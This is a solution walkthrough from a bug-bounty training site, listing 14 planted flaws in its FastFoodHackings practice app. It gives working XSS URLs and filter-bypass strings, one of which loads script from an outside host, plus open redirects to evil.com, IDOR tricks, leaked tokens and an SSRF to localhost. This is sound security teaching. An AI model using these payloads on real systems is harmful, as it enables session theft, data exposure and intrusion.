zseano's playground

ZSeano's Playground
Reveal Vulnerabilities
Preview of FastFoodHackings

Welcome to zseano's playground which is a live web application containing recreated real life web vulnerabilities. There are 14 issues to find currently (with more added regularly!). Practise your hacking skills on this web application and see if you can use your curious mindset to discover all vulnerabilities. Some might be easy to find, some may require a keen eye. Good luck!

This web application is a demo of what you can expect from our membership. BARKER is a much larger web application with more bugs, more features and more frequent updates as well as triaging of your issues!

Please note triaging of issues on this free challenge is not available and this is only available for the members area.

Happy hacking!

Rules

No automated scanners to be used at all. Where's the fun in letting a tool do all the work? Hack on the scope manually or risk being restricted from the service.
You do not need to brute force anything.
You do not need to scan for directories or files
Hack on this manually and have fun.
Subdomains are NOT in scope and you are only allowed to practise hacking on the scope defined below.

Scope

https://www.bugbountytraining.com/FFHv2/

ZSeano's Playground Vulnerabilities

Please note:

Revealing vulnerabilities may ruin the experience for you if you have not spent time testing on the defined scope as it may reveal bugs you were working on.

Please make sure to verify you wish to reveal vulnerabilities on my playground before continuing.

I understand and I wish to continue

Please note bugs marked with FLAG! indicate bugs that if discovered first would of granted you a free invite to BugBountyHunter

1. Reflective XSS

There is a reflective XSS vulnerability on the following endpoint:

http://bugbountytraining.com/FFHv2/?from=javascript:alert(0)

which is executed when the user clicks "Login" and then when they click "Return to previous website". The FROM parameter can be found from reading custom-script.js which reveals const redirectUrl = urlParams.get('from').

2. Open URL Redirect

There is an Open URL redirect on the following endpoint:

http://bugbountytraining.com/FFHv2/menu.php?returnUrl=https://www.google.com/.

This can be found when navigating to menu.php and browsing the HTML code, which shows <a href="#" id="returnUrl" style="display:none;">Go back >></a>. The use of returnUrl as an ID should be enough for an attacker to try this parameter.

3. Reflective XSS with bypass

There is an XSS vulnerability on the endpoint:

http://bugbountytraining.com/FFHv2/index.php

located in the parameter act. When sending an invalid value it will be reflected in the HTML source, however there is an XSS filter in place. To bypass it the researcher needs to establish that as long as they don't end their HTML tag, it will work, as well as using new on{} event handlers which aren't filtered.

Examples of bypasses: ?act=logina--><img src=x onpointerrawupdate=prompt`0` id=""
?act=logina--><script src=//yoursite.com?c=

4. Obtaining valid credentials to login

When browsing the menu on FastFoodHackings located at http://bugbountytraining.com/FFHv2/menu.php, a request is made to /api/loader.php?f=/reviews.php. The fact an URL is using a file (seen with the extension .php) should alert the researcher that something interesting is happening here.

From further analysis of the web application, researchers will find ?f=/generate-credentials inside the script.min.js file. Now upon visiting /api/loader.php?f=/generate-credentials, valid credentials will be created.

5. IDOR which reveals every users information

After logging in you will notice a request is made to

/FFHv2/api/profile.php?id=6b863c23-7c82-46ce-946b-1e1e895db44e&data=bio

and at first glance, the ?id= parameter appears to be a GUID value, which can't typically be brute forced. However curious minds will soon learn that you can simply use an integer value (such as 1, 2) and it will happily accept these values, thus revealing other users information!

6. FLAG! IDOR which reveals IDOR information

On the homepage you will notice

/FFHv2/api/invites.php

As a hacker you should begin to think about what other API endpoints there may be. The website is a restaurant, what do restaurant's take? Orders!

Visiting /api/orders.php will present you with an error. From trial and error you can work out that the parameter is ?order_id=. Querying ?order_id=1337 revealed a flag to gain membership for free.

7.IDOR which reveals IDOR information also vulnerable to XSS

Carrying on from the bug above, the order_id parameter is also vulnerable to XSS.

8. FLAG! Hunting through JS Files

On the homepage you will notice

https://bugbountytraining.com/assets/js/script.min.js

If you browse this .js file you can see var adToken =. Variables are useful, so save this. Next, if you found bug 4, then you'll also discover ?f=/admin returns content. Upon further inspection, you can see a reference to admin.php?adToken=. That's the value we found earlier!

Upon visiting https://www.bugbountytraining.com/FFHv2/api/admin.php?adToken=c0f22cf8-96ea-4fbb-8805-ee4246095031 a flag was revealed.

9. FLAG! Being curious

If you found bug 4, then you'll also discover ?f=/flag returned a valid flag. Great job for being curious.

10. FLAG! True is the new false

If you visit the main homepage you can see the body tag has beta-false. Adding the cookie value beta=true will reveal a new tab called BETA: FoodHackers. You're on the right track!

Next if you investigate this page you can see an input with the name flag and value reveal=false. If you put the name AND value together, you get flagreveal=false, so simply change it to true and the flag was revealed!

11. Dom XSS found via https://bugbountytraining.com/assets/js/custom-script.js

In the custom-script.js there is a javascript function named getHashValue(). If you read the code, you can also see another parameter type is verified to check if it's value 1, and if yes, redirect to the value of from. Working POC: https://bugbountytraining.com/FFHv2/?from=&type=1#redir=javascript:alert(0)

12. SSRF via https://bugbountytraining.com/FFHv2/api/loader.php?f=

Sending a blank value to loader.php?f= will produce an error which exposes the URL Url: /internalapi/fetch.php?url= and Auth bearer, Authorization: Bearer FFHpr1v4t3k3y. Visit this URL with the auth token and set the ?url= parameter to http://127.0.0.1/ or http://localhost/ and you're able to hit internal services!

13. Open redirect on /go found via robots.txt

robots.txt exposes the endpoint /go which if visited will display an error about the return url parameter being invalid. From trial and error you can discover returnUrl parameter will redirect to any domain. Working POC: https://www.bugbountytraining.com/FFHv2/go.php?returnUrl=//evil.com

14. XSS on /go.php when redirecting

If you discovered the bug above, you should notice #type=0 is appended on the redirect. If you revisit /go.php?returnUrl=//evil.com&type=0 but change 0 to 1, then you'll see the redirect method has changed and uses top.location.href. Working POC: https://www.bugbountytraining.com/FFHv2/go.php?returnUrl=javascript:alert(0)//&type=1 or https://www.bugbountytraining.com/FFHv2/go.php?returnUrl=%27-alert(0)-%27k&type=1 or https://www.bugbountytraining.com/FFHv2/go.php?returnUrl=%3C/script%3E%3Csvg/onload=alert(0)%3E&type=1

BugBountyHunter

Reveal Vulnerabilities

ZSeano's Playground

Rules

Scope

ZSeano's Playground Vulnerabilities

Please note: